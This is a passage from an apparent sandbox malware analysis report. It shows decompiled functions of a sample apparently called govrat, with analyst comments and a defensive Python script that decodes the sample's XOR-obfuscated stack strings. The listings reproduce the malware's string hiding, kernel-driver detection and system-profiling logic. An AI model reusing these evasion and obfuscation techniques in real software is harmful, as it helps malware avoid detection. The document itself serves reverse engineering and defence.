    				_t72 = __eax;
    				// Blob 1: 18 bytes at [frame-0x1f], XOR key 0xf2; it reads "EnumDeviceDrivers"
    				// (the API list below confirms K32EnumDeviceDrivers). [frame-0xd] is the decoded flag.
    				 *((intOrPtr*)(_t79 - 0x11)) = 0xf2818097;
    				 *((intOrPtr*)(_t79 - 0x15)) = 0x849b80b6;
    				 *((intOrPtr*)(_t79 - 0x19)) = 0x97919b84;
    				 *((intOrPtr*)(_t79 - 0x1d)) = 0x97b69f87;
    				 *(_t79 - 0x1f) = 0x9cb7;
    				 *((char*)(_t79 - 0xd)) = __ebx;
    				_t45 = 0;
    				do {
    					 *(_t79 + _t45 - 0x1f) =  *(_t79 + _t45 - 0x1f) ^ 0x000000f2;
    					_t45 = _t45 + 1;
    				} while (_t45 < 0x12);
    				 *((char*)(_t79 - 0xd)) = 1;
    				_t47 = GetProcAddress(__eax, _t79 - 0x1f); // executed: EnumDeviceDrivers from the module handle passed in __eax
    				 *(_t79 - 0x40) = _t47;
    				// Blob 2: 25 bytes at [frame-0x39], XOR key 0xf3; it reads "GetDeviceDriverBaseNameW".
    				 *((intOrPtr*)(_t79 - 0x24)) = 0xf3a4969e;
    				 *((intOrPtr*)(_t79 - 0x28)) = 0x92bd9680;
    				 *((intOrPtr*)(_t79 - 0x2c)) = 0x92b18196;
    				 *((intOrPtr*)(_t79 - 0x30)) = 0x859a81b7;
    				 *((intOrPtr*)(_t79 - 0x34)) = 0x96909a85;
    				 *((intOrPtr*)(_t79 - 0x38)) = 0x96b78796;
    				 *(_t79 - 0x39) = 0xb4;
    				 *((char*)(_t79 - 0x20)) = __ebx;
    				_t48 = 0;
    				do {
    					 *(_t79 + _t48 - 0x39) =  *(_t79 + _t48 - 0x39) ^ 0x000000f3;
    					_t48 = _t48 + 1;
    				} while (_t48 < 0x19);
    				 *((char*)(_t79 - 0x20)) = 1;
    				_t50 = GetProcAddress(_t72, _t79 - 0x39); // executed: GetDeviceDriverBaseNameW
    				 *(_t79 - 8) = _t50;
    				if( *(_t79 - 0x40) == __ebx || _t50 == __ebx) {
    					L14:
    					_t51 = 0;
    				} else {
    					 *(_t79 - 0x40)(_t79 - 0x44, 4, _t79 - 0xc); // EnumDeviceDrivers(&tmp, 4, &needed): size query, cbNeeded lands in [frame-0xc]
    					_t77 =  *(_t79 - 0xc);
    					_t88 =  *(_t79 - 0xc) - __ebx;
    					if( *(_t79 - 0xc) == __ebx) {
    						goto L14;
    					} else {
    						_t74 = E0095C795(_t71, _t77, _t88); // allocates the base-address array (allocator not shown; freed by E0095115B on both exits)
    						if(_t74 == __ebx) {
    							goto L14;
    						} else {
    							_push(_t79 - 0x44);
    							_push( *(_t79 - 0xc));
    							_push(_t74); // executed
    							if( *(_t79 - 0x40)() == 0) { // EnumDeviceDrivers(array, needed, &needed)
    								L13:
    								E0095115B(_t67, _t71, _t77, _t74);
    								goto L14;
    							} else {
    								_t77 =  *(_t79 - 0xc) >> 2; // number of driver base addresses (4 bytes each)
    								if(_t77 > __ebx) {
    									do {
    										_push(0x400);
    										_push(_t79 - 0x844);
    										_push( *((intOrPtr*)(_t74 + _t65 * 4)));
    										if( *(_t79 - 8)() == 0) { // GetDeviceDriverBaseNameW(array[i], name, 0x400)
    											goto L12;
    										} else {
    											_t62 = L00951C05(_t79 - 0x844,  *((intOrPtr*)(_t79 + 8))); // __wcsicoll: case-insensitive compare of the driver name with the caller's argument
    											_pop(_t67);
    											if(_t62 == 0) {
    												E0095115B(_t67, _t71, _t77, _t74);
    												_t51 = 1; // a loaded kernel driver with the requested base name was found
    											} else {
    												goto L12;
    											}
    										}
    										goto L15;
    										L12:
    										_t65 = _t65 + 1;
    									} while (_t65 < _t77);
    								}
    								goto L13;
    							}
    						}
    					}
    				}
    				L15:
    				return _t51;
    			}

    Statement addresses (in the original layout this column sits beside the listing, one entry per decompiled statement; 0x00000000 marks a statement, such as a goto, that has no instruction of its own):
    0x0095fe2e, 0x0095fe2e, 0x0095fe30, 0x0095fe37, 0x0095fe3e, 0x0095fe45, 0x0095fe4c, 0x0095fe52, 0x0095fe55, 0x0095fe57,
    0x0095fe57, 0x0095fe5c, 0x0095fe5d, 0x0095fe6d, 0x0095fe71, 0x0095fe73, 0x0095fe76, 0x0095fe7d, 0x0095fe84, 0x0095fe8b,
    0x0095fe92, 0x0095fe99, 0x0095fea0, 0x0095fea4, 0x0095fea7, 0x0095fea9, 0x0095fea9, 0x0095feae, 0x0095feaf, 0x0095feb9,
    0x0095febd, 0x0095febf, 0x0095fec5, 0x0095ff3a, 0x0095ff3a, 0x0095fecb, 0x0095fed5, 0x0095fed8, 0x0095fedb, 0x0095fedd,
    0x00000000, 0x0095fedf, 0x0095fee4, 0x0095fee8, 0x00000000, 0x0095feea, 0x0095feed, 0x0095feee, 0x0095fef1, 0x0095fef7,
    0x0095ff33, 0x0095ff34, 0x00000000, 0x0095fef9, 0x0095fefc, 0x0095ff01, 0x0095ff03, 0x0095ff03, 0x0095ff0e, 0x0095ff0f,
    0x0095ff17, 0x00000000, 0x0095ff19, 0x0095ff23, 0x0095ff29, 0x0095ff2c, 0x0095ff42, 0x0095ff4a, 0x00000000, 0x00000000,
    0x00000000, 0x0095ff2c, 0x00000000, 0x0095ff2e, 0x0095ff2e, 0x0095ff2f, 0x0095ff03, 0x00000000, 0x0095ff01, 0x0095fef7,
    0x0095fee8, 0x0095fedd, 0x0095ff3c, 0x0095ff40

    APIs
    • GetProcAddress.KERNEL32(?,000000F2), ref: 0095FE71
    • GetProcAddress.KERNEL32(?,000000F3), ref: 0095FEBD
    • K32EnumDeviceDrivers.KERNEL32(?,00000004,?,?,000000F3), ref: 0095FED5
    • K32EnumDeviceDrivers.KERNEL32(00000000,?,?,?,000000F3), ref: 0095FEF2
    • K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400,?,000000F3), ref: 0095FF12
    • __wcsicoll.LIBCMT ref: 0095FF23
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
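    The three listings above share one string-hiding pattern: every API, module or path name is written to the stack as 32-, 16- and 8-bit immediates, and in E00960762 and E0095FE2E the bytes are additionally XOR-decoded in place by a short loop. The script below is an added example, not part of the Joe Sandbox report or of the sample, that recovers such strings mechanically from the decompiler text instead of by hand. It assumes the listing format seen on this page (the `*((type*)(_tN - off)) = imm;` stores and the `^ 0xKK ... while (_tN < LEN)` loop), infers the width of an uncast store from the size of its value, and takes each blob's stores from the text between the previous decode loop and its own, since the function reuses the same frame slots for successive blobs. The two snippet constants are copied from E00965B62 and E00960762 above; the `*_SNIPPET` names and the helper functions are this example's own.

```python
"""Recover stack strings from decompiler listings of the kind shown above.

Added example (not part of the Joe Sandbox report).  It parses the immediate
stores the decompiler prints, rebuilds the little-endian frame image, and
applies the key and trip count of the `^ 0xKK ... while (_tN < LEN)` loop
that follows each blob.  Unencoded stack strings are read with key 0.
"""
import re

# One immediate store to the frame.  When the decompiler omits the cast the
# width is inferred from the value size (assumption of this example).
STORE_RE = re.compile(
    r"\*\s*(?:\(\((?P<type>intOrPtr|short|char)\*\))?"
    r"\(_t\d+\s*(?P<sign>[+-])\s*(?P<off>0x[0-9a-fA-F]+|\d+)\)\)?"
    r"\s*=\s*(?P<val>0x[0-9a-fA-F]+|\d+)\s*;"
)
# The byte-wise XOR loop: start offset, key, and trip count (= blob length).
XOR_RE = re.compile(
    r"\*\(_t\d+ \+ _t\d+ (?P<sign>[+-]) (?P<off>0x[0-9a-fA-F]+|\d+)\) = .*?"
    r"\^ (?P<key>0x[0-9a-fA-F]+);[\s\S]*?while \(_t\d+ < (?P<len>0x[0-9a-fA-F]+|\d+)\)"
)
CAST_WIDTH = {"intOrPtr": 4, "short": 2, "char": 1}

def _num(text):
    return int(text, 0)

def _offset(sign, off):
    return -_num(off) if sign == "-" else _num(off)

def parse_stores(listing):
    """Map frame offset -> byte for every immediate store, in source order."""
    mem = {}
    for m in STORE_RE.finditer(listing):
        val = _num(m["val"])
        width = CAST_WIDTH.get(m["type"]) or max(1, (val.bit_length() + 7) // 8)
        base = _offset(m["sign"], m["off"])
        for i in range(width):  # x86 stores are little-endian
            mem[base + i] = (val >> (8 * i)) & 0xFF
    return mem

def extract(mem, base, length=None, key=0):
    """Read bytes from `base` (at most `length`), XOR with `key`, stop at NUL."""
    out, off = bytearray(), base
    while (length is None or off < base + length) and off in mem:
        byte = mem[off] ^ key
        if byte == 0:
            break
        out.append(byte)
        off += 1
    return out.decode("latin-1")

def xor_strings(listing):
    """Decode every XOR-loop blob.  Stores are collected only from the text
    since the previous loop because the sample reuses the same frame slots."""
    found, cursor = [], 0
    for m in XOR_RE.finditer(listing):
        mem = parse_stores(listing[cursor:m.start()])
        found.append(extract(mem, _offset(m["sign"], m["off"]),
                             _num(m["len"]), _num(m["key"])))
        cursor = m.end()
    return found

# Copied from E00965B62 above: one plain stack string passed to GetProcAddress.
WINHTTP_SNIPPET = """
 *(_t179 + 0x58) = 0x486e6957;
 *((intOrPtr*)(_t179 + 0x5c)) = 0x43707474;
 *((intOrPtr*)(_t179 + 0x60)) = 0x656e6e6f;
 *((short*)(_t179 + 0x64)) = 0x7463;
 *((char*)(_t179 + 0x66)) = 0;
"""

# Copied from E00960762 above: the first two XOR blobs and their decode loops.
XOR_SNIPPET = """
 *((intOrPtr*)(_t88 - 5)) = 0x65391617;
 *((intOrPtr*)(_t88 - 9)) = 0x130c17;
 *((intOrPtr*)(_t88 - 0xd)) = 0x1395756;
 *((intOrPtr*)(_t88 - 0x11)) = 0x8001116;
 *((short*)(_t88 - 0x13)) = 0x1c16;
 *((char*)(_t88 - 0x14)) = 0x39;
  *(_t88 + _t51 - 0x14) =  *(_t88 + _t51 - 0x14) ^ 0x00000065;
  _t51 = _t51 + 1;
 } while (_t51 < 0x13);
 *((intOrPtr*)(_t88 - 0x1b)) = 0x66151f15;
 *((intOrPtr*)(_t88 - 0x1f)) = 0x48000d05;
 *((short*)(_t88 - 0x21)) = 0x1007;
  *(_t88 + _t56 - 0x21) =  *(_t88 + _t56 - 0x21) ^ 0x00000066;
  _t56 = _t56 + 1;
 } while (_t56 < 0xa);
"""

def recover_all():
    """Strings recovered from both snippets, in listing order."""
    winhttp = extract(parse_stores(WINHTTP_SNIPPET), 0x58)
    return [winhttp] + xor_strings(XOR_SNIPPET)

if __name__ == "__main__":
    print(recover_all())
```

Run as a file it prints `['WinHttpConnect', '\\system32\\drivers\\', 'avckf.sys']`. Fed the whole E00960762 listing, `xor_strings` returns all four blobs, the last two being the `FindClose` and `kernel32` names that the function only resolves after the driver file has been found; fed E0095FE2E it returns `EnumDeviceDrivers` and `GetDeviceDriverBaseNameW`. The uncast 16-bit store `*(_t79 - 0x1f) = 0x9cb7;` in that function is why the width heuristic is needed: treating it as a 4-byte store would zero the two bytes the next store had already written.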
    C-Code - Quality: 89%
    			E009641C3(struct HINSTANCE__* __eax, signed short* __edx, void* __edi) {
    				void* __esi;
    				int _t494;
    				signed short* _t496;
    				void* _t499;
    				char* _t501;
    				void* _t502;
    				signed short _t504;
    				short _t505;
    				short _t506;
    				short _t507;
    				short _t508;
    				short _t509;
    				short _t510;
    				short _t511;
    				signed short* _t520;
    				signed short* _t521;
    				signed short _t522;
    				signed short* _t523;
    				signed short* _t524;
    				intOrPtr _t525;
    				void* _t532;
    				intOrPtr* _t535;
    				void* _t538;
    				intOrPtr* _t540;
    				intOrPtr* _t541;
    				signed short* _t545;
    				signed short* _t548;
    				signed short* _t551;
    				signed short* _t554;
    				signed short* _t557;
    				signed short* _t773;
    				void* _t780;
    				void* _t782;
    				void* _t783;
    				short _t785;
    				short _t786;
    				short _t787;
    				short _t788;
    				short _t789;
    				short _t790;
    				short _t791;
    				short _t794;
    				short _t795;
    				short _t796;
    				short _t797;
    				short _t798;
    				short _t799;
    				short _t800;
    				short _t803;
    				short _t804;
    				short _t805;
    				short _t806;
    				short _t807;
    				short _t808;
    				short _t809;
    				signed int _t821;
    				signed short* _t822;
    				intOrPtr _t823;
    				intOrPtr* _t826;
    				signed int _t828;
    				void* _t830;
    				void* _t831;
    				signed short _t833;
    				signed short _t834;
    				signed int _t838;
    				signed short* _t839;
    				signed int _t849;
    				signed int _t850;
    				void* _t851;
    				void* _t852;
    				signed short _t853;
    				signed short* _t854;
    				void* _t855;
    				signed short* _t856;
    				signed short* _t879;
    				intOrPtr* _t880;
    				intOrPtr _t881;
    				WCHAR* _t883;
    				signed short* _t884;
    				signed short* _t886;
    				signed short* _t888;
    				void* _t889;
    
    				_t855 = __edi;
    				_t839 = __edx;
    				GetProcAddress(__eax, ??); // executed
    				_t776 = _t889 - 0x480;
    				_t494 = GetDiskFreeSpaceExW(_t883, _t889 - 0x480, _t889 - 0x478, 0); // executed
    				if(_t494 == 0) {
    					 *(__edi + 0x55c) = 0;
    					 *(__edi + 0x558) = 0;
    				} else {
    					 *(__edi + 0x558) = ( *(_t889 - 0x474) << 0x00000020 |  *(_t889 - 0x478)) >> 0x14;
    					_t838 =  *(_t889 - 0x47c);
    					_t776 = _t838 >> 0x14;
    					 *(__edi + 0x55c) = (_t838 << 0x00000020 |  *(_t889 - 0x480)) >> 0x14;
    				}
    				E0095115B(_t776, _t839, _t883, _t883);
    				_t496 = E0095D461(0, _t855, _t883, 0); // executed
    				_t856 = _t496;
    				_push(_t889 - 0x90);
    				_t884 = _t889 - 0x46c;
    				 *(_t889 - 0x9c) = _t856;
    				 *(_t889 - 0x18) = 0;
    				L0095D1A8(); // executed
    				if( *(_t889 - 0x46c) != 0) {
    					_t557 = E0095D461(0, _t856, _t884, 1); // executed
    					 *(_t889 - 0x18) = _t557;
    				}
    				if(_t856 == 0) {
    					_t780 = 0;
    				} else {
    					_t554 = _t856;
    					_t25 =  &(_t554[1]); // 0x2
    					_t839 = _t25;
    					do {
    						_t834 =  *_t554;
    						_t554 =  &(_t554[1]);
    					} while (_t834 != 0);
    					_t780 = (_t554 - _t839 >> 1) + (_t554 - _t839 >> 1);
    				}
    				if( *(_t889 - 0x18) == 0) {
    					_t499 = 0;
    				} else {
    					_t551 =  *(_t889 - 0x18);
    					_t884 =  &(_t551[1]);
    					do {
    						_t839 =  *_t551;
    						_t551 =  &(_t551[1]);
    					} while (_t839 != 0);
    					_t499 = (_t551 - _t884 >> 1) + (_t551 - _t884 >> 1);
    				}
    				_t501 = E00951195(_t839, _t856, _t884, _t499 + _t780 + 0x960);
    				 *((intOrPtr*)(_t889 - 0x470)) = _t501;
    				_t782 = 0x400;
    				do {
    					 *_t501 = 0;
    					_t501 = _t501 + 1;
    					_t782 = _t782 - 1;
    				} while (_t782 != 0);
    				if(_t856 == 0) {
    					_t783 = 0;
    				} else {
    					_t548 = _t856;
    					_t33 =  &(_t548[1]); // 0x2
    					_t854 = _t33;
    					do {
    						_t833 =  *_t548;
    						_t548 =  &(_t548[1]);
    					} while (_t833 != 0);
    					_t783 = (_t548 - _t854 >> 1) + (_t548 - _t854 >> 1);
    				}
    				if( *(_t889 - 0x18) == 0) {
    					_t502 = 0;
    				} else {
    					_t545 =  *(_t889 - 0x18);
    					_t888 =  &(_t545[1]);
    					do {
    						_t853 =  *_t545;
    						_t545 =  &(_t545[1]);
    					} while (_t853 != 0);
    					_t502 = (_t545 - _t888 >> 1) + (_t545 - _t888 >> 1);
    				}
    				 *((intOrPtr*)(_t889 - 0x464)) = _t502 + _t783 + 0x960;
    				_t504 = 0x20;
    				 *((short*)(_t889 - 0xbc)) = _t504;
    				_t785 = 0x28;
    				 *((short*)(_t889 - 0xba)) = _t785;
    				_t786 = 0x36;
    				 *((short*)(_t889 - 0xb8)) = _t786;
    				_t787 = 0x34;
    				 *((short*)(_t889 - 0xb6)) = _t787;
    				_t788 = 0x62;
    				 *((short*)(_t889 - 0xb4)) = _t788;
    				_t789 = 0x69;
    				 *((short*)(_t889 - 0xb2)) = _t789;
    				_t790 = 0x74;
    				 *((short*)(_t889 - 0xb0)) = _t790;
    				_t791 = 0x29;
    				 *((short*)(_t889 - 0xae)) = _t791;
    				 *((short*)(_t889 - 0xac)) = 0;
    				 *((short*)(_t889 - 0xd0)) = _t504;
    				_t794 = 0x28;
    				 *((short*)(_t889 - 0xce)) = _t794;
    				_t795 = 0x33;
    				 *((short*)(_t889 - 0xcc)) = _t795;
    				_t796 = 0x32;
    				 *((short*)(_t889 - 0xca)) = _t796;
    				_t797 = 0x62;
    				 *((short*)(_t889 - 0xc8)) = _t797;
    				_t798 = 0x69;
    				 *((short*)(_t889 - 0xc6)) = _t798;
    				_t799 = 0x74;
    				 *((short*)(_t889 - 0xc4)) = _t799;
    				_t800 = 0x29;
    				 *((short*)(_t889 - 0xc2)) = _t800;
    				 *((short*)(_t889 - 0xc0)) = 0;
    				 *(_t889 - 0x128) = _t504;
    				_t803 = 0x5b;
    				 *((short*)(_t889 - 0x126)) = _t803;
    				_t804 = 0x47;
    				 *((short*)(_t889 - 0x124)) = _t804;
    				_t805 = 0x55;
    				 *((short*)(_t889 - 0x122)) = _t805;
    				_t806 = 0x45;
    				 *((short*)(_t889 - 0x120)) = _t806;
    				_t807 = 0x53;
    				 *((short*)(_t889 - 0x11e)) = _t807;
    				_t808 = 0x54;
    				 *((short*)(_t889 - 0x11c)) = _t808;
    				_t809 = 0x5d;
    				 *((short*)(_t889 - 0x11a)) = _t809;
    				 *((short*)(_t889 - 0x118)) = 0;
    				 *(_t889 - 0x114) = _t504;
    				_t505 = 0x5b;
    				 *((short*)(_t889 - 0x112)) = _t505;
    				_t506 = 0x41;
    				 *((short*)(_t889 - 0x110)) = _t506;
    				_t507 = 0x44;
    				 *((short*)(_t889 - 0x10e)) = _t507;
    				_t508 = 0x4d;
    				 *((short*)(_t889 - 0x10c)) = _t508;
    				_t509 = 0x49;
    				 *((short*)(_t889 - 0x10a)) = _t509;
    				_t510 = 0x4e;
    				 *((short*)(_t889 - 0x108)) = _t510;
    				_t511 = 0x5d;
    				 *((short*)(_t889 - 0x106)) = _t511;
    				 *((short*)(_t889 - 0x104)) = 0;
    				 *((short*)(_t889 - 0xf2)) = 0xdb;
    				 *((short*)(_t889 - 0xf4)) = 0xdb;
    				 *((short*)(_t889 - 0xf6)) = 0x8c;
    				 *((short*)(_t889 - 0xf8)) = 0x94;
    				 *((short*)(_t889 - 0xfa)) = 0xdb;
    				 *((short*)(_t889 - 0xfc)) = 0x90;
    				 *((short*)(_t889 - 0xfe)) = 0xdb;
    				 *((short*)(_t889 - 0x100)) = 0x8e;
    				 *((short*)(_t889 - 0x258)) = 0xe6;
    				 *((short*)(_t889 - 0x25a)) = 0xdb;
    				 *((short*)(_t889 - 0x25c)) = 0xc3;
    				 *((short*)(_t889 - 0x25e)) = 0xec;
    				 *((short*)(_t889 - 0x260)) = 0xdc;
    				 *((short*)(_t889 - 0x262)) = 0xcf;
    				 *((short*)(_t889 - 0x264)) = 0xd2;
    				 *((short*)(_t889 - 0x266)) = 0xd0;
    				 *((short*)(_t889 - 0x268)) = 0x9e;
    				 *((short*)(_t889 - 0x26a)) = 0xce;
    				 *((short*)(_t889 - 0x26c)) = 0xc6;
    				 *((short*)(_t889 - 0x26e)) = 0x92;
    				 *((char*)(_t889 - 0xf0)) = 0;
    				 *((short*)(_t889 - 0x270)) = 0xdb;
    				 *((short*)(_t889 - 0x272)) = 0x8f;
    				 *((short*)(_t889 - 0x274)) = 0xaa;
    				 *((short*)(_t889 - 0x276)) = 0x88;
    				 *((short*)(_t889 - 0x278)) = 0x89;
    				 *((short*)(_t889 - 0x27a)) = 0x8f;
    				 *((short*)(_t889 - 0x27c)) = 0x92;
    				 *((short*)(_t889 - 0x27e)) = 0x87;
    				 *((short*)(_t889 - 0x280)) = 0x85;
    				 *((short*)(_t889 - 0x282)) = 0x8f;
    				 *((short*)(_t889 - 0x284)) = 0x8a;
    				 *((short*)(_t889 - 0x286)) = 0x96;
    				 *((short*)(_t889 - 0x288)) = 0x96;
    				 *((short*)(_t889 - 0x28a)) = 0xa7;
    				 *((short*)(_t889 - 0x28c)) = 0xec;
    				 *((short*)(_t889 - 0x28e)) = 0xdb;
    				 *((short*)(_t889 - 0x290)) = 0xc3;
    				 *((short*)(_t889 - 0x292)) = 0xec;
    				 *((short*)(_t889 - 0x294)) = 0xdc;
    				 *((short*)(_t889 - 0x296)) = 0xcf;
    				 *((short*)(_t889 - 0x298)) = 0xd0;
    				 *((short*)(_t889 - 0x29a)) = 0xde;
    				 *((short*)(_t889 - 0x29c)) = 0x9e;
    				 *((short*)(_t889 - 0x29e)) = 0xce;
    				 *((short*)(_t889 - 0x2a0)) = 0xc6;
    				 *((short*)(_t889 - 0x2a2)) = 0x92;
    				 *((short*)(_t889 - 0x2a4)) = 0xdb;
    				 *((short*)(_t889 - 0x2a6)) = 0x8f;
    				 *((short*)(_t889 - 0x2a8)) = 0xaa;
    				 *((short*)(_t889 - 0x2aa)) = 0xc6;
    				 *((short*)(_t889 - 0x2ac)) = 0x88;
    				 *((short*)(_t889 - 0x2ae)) = 0x89;
    				 *((short*)(_t889 - 0x2b0)) = 0x8f;
    				 *((short*)(_t889 - 0x2ba)) = 0x8a;
    				 *((short*)(_t889 - 0x2b2)) = 0x92;
    				 *((short*)(_t889 - 0x2be)) = 0x96;
    				 *((short*)(_t889 - 0x2b4)) = 0x87;
    				 *((short*)(_t889 - 0x2c0)) = 0xa7;
    				 *((short*)(_t889 - 0x2c2)) = 0xec;
    				 *((short*)(_t889 - 0x2c4)) = 0xdb;
    				 *((short*)(_t889 - 0x2c6)) = 0xc3;
    				 *((short*)(_t889 - 0x2c8)) = 0xc6;
    				 *((short*)(_t889 - 0x2ca)) = 0xdc;
    				 *((short*)(_t889 - 0x2cc)) = 0xa2;
    				 *((short*)(_t889 - 0x2bc)) = 0x96;
    				 *((short*)(_t889 - 0x2ce)) = 0xaf;
    				 *((intOrPtr*)(_t889 - 0x2b8)) = 0x85008f;
    				 *((short*)(_t889 - 0x2d0)) = 0xb5;
    				 *((short*)(_t889 - 0x2d2)) = 0xec;
    				 *((short*)(_t889 - 0x2d4)) = 0xdb;
    				 *((short*)(_t889 - 0x2d6)) = 0xc3;
    				 *((short*)(_t889 - 0x2d8)) = 0xdb;
    				 *((short*)(_t889 - 0x2da)) = 0xc3;
    				 *((short*)(_t889 - 0x2dc)) = 0xdb;
    				 *((short*)(_t889 - 0x2de)) = 0xc3;
    				 *((short*)(_t889 - 0x2e0)) = 0xdb;
    				 *((short*)(_t889 - 0x2e2)) = 0xc3;
    				 *((short*)(_t889 - 0x2e4)) = 0xdb;
    				 *((short*)(_t889 - 0x2e6)) = 0xc3;
    				 *((short*)(_t889 - 0x2e8)) = 0xc6;
    				 *((short*)(_t889 - 0x2ea)) = 0xdc;
    				 *((short*)(_t889 - 0x2ec)) = 0x89;
    				 *((short*)(_t889 - 0x2f4)) = 0xc6;
    				 *((short*)(_t889 - 0x2ee)) = 0x80;
    				 *((short*)(_t889 - 0x2f6)) = 0x94;
    				 *((short*)(_t889 - 0x2f8)) = 0x83;
    				 *((short*)(_t889 - 0x2fa)) = 0xdb;
    				 *((short*)(_t889 - 0x2fc)) = 0xb3;
    				 *((short*)(_t889 - 0x2fe)) = 0xec;
    				 *((short*)(_t889 - 0x300)) = 0xec;
    				 *((short*)(_t889 - 0x302)) = 0xcf;
    				 *((short*)(_t889 - 0x304)) = 0xdb;
    				 *((short*)(_t889 - 0x306)) = 0xc3;
    				 *((short*)(_t889 - 0x308)) = 0xce;
    				 *((short*)(_t889 - 0x30a)) = 0xc6;
    				 *((short*)(_t889 - 0x30c)) = 0xdb;
    				 *((short*)(_t889 - 0x30e)) = 0xc3;
    				 *((short*)(_t889 - 0x310)) = 0xb9;
    				 *((short*)(_t889 - 0x312)) = 0xdb;
    				 *((short*)(_t889 - 0x314)) = 0xc3;
    				 *((short*)(_t889 - 0x316)) = 0xc6;
    				 *((short*)(_t889 - 0x318)) = 0xdc;
    				 *((short*)(_t889 - 0x31a)) = 0x83;
    				 *((short*)(_t889 - 0x31c)) = 0x8a;
    				 *((short*)(_t889 - 0x31e)) = 0x87;
    				 *((short*)(_t889 - 0x320)) = 0x85;
    				 *((short*)(_t889 - 0x322)) = 0x89;
    				 *((intOrPtr*)(_t889 - 0x2f2)) = 0x8800af;
    				 *((short*)(_t889 - 0x324)) = 0xaa;
    				 *((short*)(_t889 - 0x326)) = 0xec;
    				 *((short*)(_t889 - 0x328)) = 0x9b;
    				 *((short*)(_t889 - 0x32a)) = 0xdb;
    				 *((short*)(_t889 - 0x32c)) = 0xc3;
    				 *((short*)(_t889 - 0x32e)) = 0x9d;
    				 *((short*)(_t889 - 0x330)) = 0xc6;
    				 *((short*)(_t889 - 0x332)) = 0xdb;
    				 *((short*)(_t889 - 0x334)) = 0xc3;
    				 *((short*)(_t889 - 0x336)) = 0xdb;
    				 *((short*)(_t889 - 0x338)) = 0xc3;
    				 *((short*)(_t889 - 0x33a)) = 0xdb;
    				 *((short*)(_t889 - 0x33c)) = 0xc3;
    				 *((short*)(_t889 - 0x33e)) = 0xdb;
    				 *((short*)(_t889 - 0x340)) = 0xc3;
    				 *((short*)(_t889 - 0x342)) = 0xc6;
    				 *((short*)(_t889 - 0x344)) = 0xdc;
    				 *((short*)(_t889 - 0x346)) = 0x89;
    				 *((short*)(_t889 - 0x348)) = 0x92;
    				 *((short*)(_t889 - 0x34a)) = 0xc6;
    				 *((short*)(_t889 - 0x34c)) = 0x82;
    				 *((short*)(_t889 - 0x34e)) = 0x83;
    				 *((short*)(_t889 - 0x350)) = 0x94;
    				 *((short*)(_t889 - 0x352)) = 0x83;
    				 *((short*)(_t889 - 0x354)) = 0x92;
    				 *((short*)(_t889 - 0x356)) = 0xdb;
    				 *((short*)(_t889 - 0x358)) = 0x8f;
    				 *((short*)(_t889 - 0x35a)) = 0x81;
    				 *((short*)(_t889 - 0x35c)) = 0x83;
    				 *((short*)(_t889 - 0x35e)) = 0xb4;
    				 *((short*)(_t889 - 0x360)) = 0xec;
    				 *((short*)(_t889 - 0x362)) = 0xdb;
    				 *((short*)(_t889 - 0x364)) = 0xc3;
    				 *((short*)(_t889 - 0x366)) = 0xdb;
    				 *((short*)(_t889 - 0x368)) = 0xc3;
    				 *((short*)(_t889 - 0x36a)) = 0xdb;
    				 *((short*)(_t889 - 0x36c)) = 0xc3;
    				 *((short*)(_t889 - 0x36e)) = 0xdb;
    				 *((short*)(_t889 - 0x370)) = 0xc3;
    				 *((short*)(_t889 - 0x372)) = 0xdb;
    				 *((short*)(_t889 - 0x374)) = 0xc3;
    				 *((short*)(_t889 - 0x376)) = 0xc6;
    				 *((short*)(_t889 - 0x378)) = 0xdc;
    				 *((short*)(_t889 - 0x37a)) = 0x88;
    				 *((short*)(_t889 - 0x37c)) = 0x89;
    				 *((short*)(_t889 - 0x37e)) = 0x8f;
    				 *((short*)(_t889 - 0x380)) = 0xdb;
    				 *((short*)(_t889 - 0x382)) = 0x94;
    				 *((short*)(_t889 - 0x384)) = 0x83;
    				 *((short*)(_t889 - 0x386)) = 0xb0;
    				 *((short*)(_t889 - 0x388)) = 0xc6;
    				 *((short*)(_t889 - 0x38a)) = 0xdb;
    				 *((short*)(_t889 - 0x38c)) = 0x91;
    				 *((short*)(_t889 - 0x38e)) = 0x89;
    				 *((short*)(_t889 - 0x390)) = 0x82;
    				 *((short*)(_t889 - 0x392)) = 0x88;
    				 *((short*)(_t889 - 0x394)) = 0x8f;
    				 *((short*)(_t889 - 0x396)) = 0xb1;
    				 *((short*)(_t889 - 0x398)) = 0xec;
    				 *((short*)(_t889 - 0x39a)) = 0xec;
    				 *((short*)(_t889 - 0x39c)) = 0x8a;
    				 *((short*)(_t889 - 0x39e)) = 0x87;
    				 *((short*)(_t889 - 0x3a0)) = 0x92;
    				 *((short*)(_t889 - 0x3a2)) = 0x89;
    				 *((short*)(_t889 - 0x3a4)) = 0x92;
    				 *((short*)(_t889 - 0x3a6)) = 0xc6;
    				 *((short*)(_t889 - 0x3a8)) = 0xa4;
    				 *((short*)(_t889 - 0x3aa)) = 0xab;
    				 *((short*)(_t889 - 0x3ac)) = 0x82;
    				 *((short*)(_t889 - 0x3ae)) = 0xc3;
    				 *((short*)(_t889 - 0x3b0)) = 0xc6;
    				 *((short*)(_t889 - 0x3b2)) = 0xc9;
    				 *((short*)(_t889 - 0x3b4)) = 0xc6;
    				 *((short*)(_t889 - 0x3b6)) = 0x83;
    				 *((short*)(_t889 - 0x3b8)) = 0x83;
    				 *((short*)(_t889 - 0x3ba)) = 0x94;
    				 *((short*)(_t889 - 0x3bc)) = 0x80;
    				 *((short*)(_t889 - 0x3be)) = 0xc6;
    				 *((short*)(_t889 - 0x3c0)) = 0xa4;
    				 *((short*)(_t889 - 0x3c2)) = 0xab;
    				 *((short*)(_t889 - 0x3c4)) = 0x82;
    				 *((short*)(_t889 - 0x3c6)) = 0xc3;
    				 *((short*)(_t889 - 0x3c8)) = 0xc6;
    				 *((short*)(_t889 - 0x3ca)) = 0xdc;
    				 *((short*)(_t889 - 0x3cc)) = 0x8d;
    				 *((short*)(_t889 - 0x3ce)) = 0xdb;
    				 *((short*)(_t889 - 0x3d0)) = 0x8f;
    				 *((short*)(_t889 - 0x3d2)) = 0xa2;
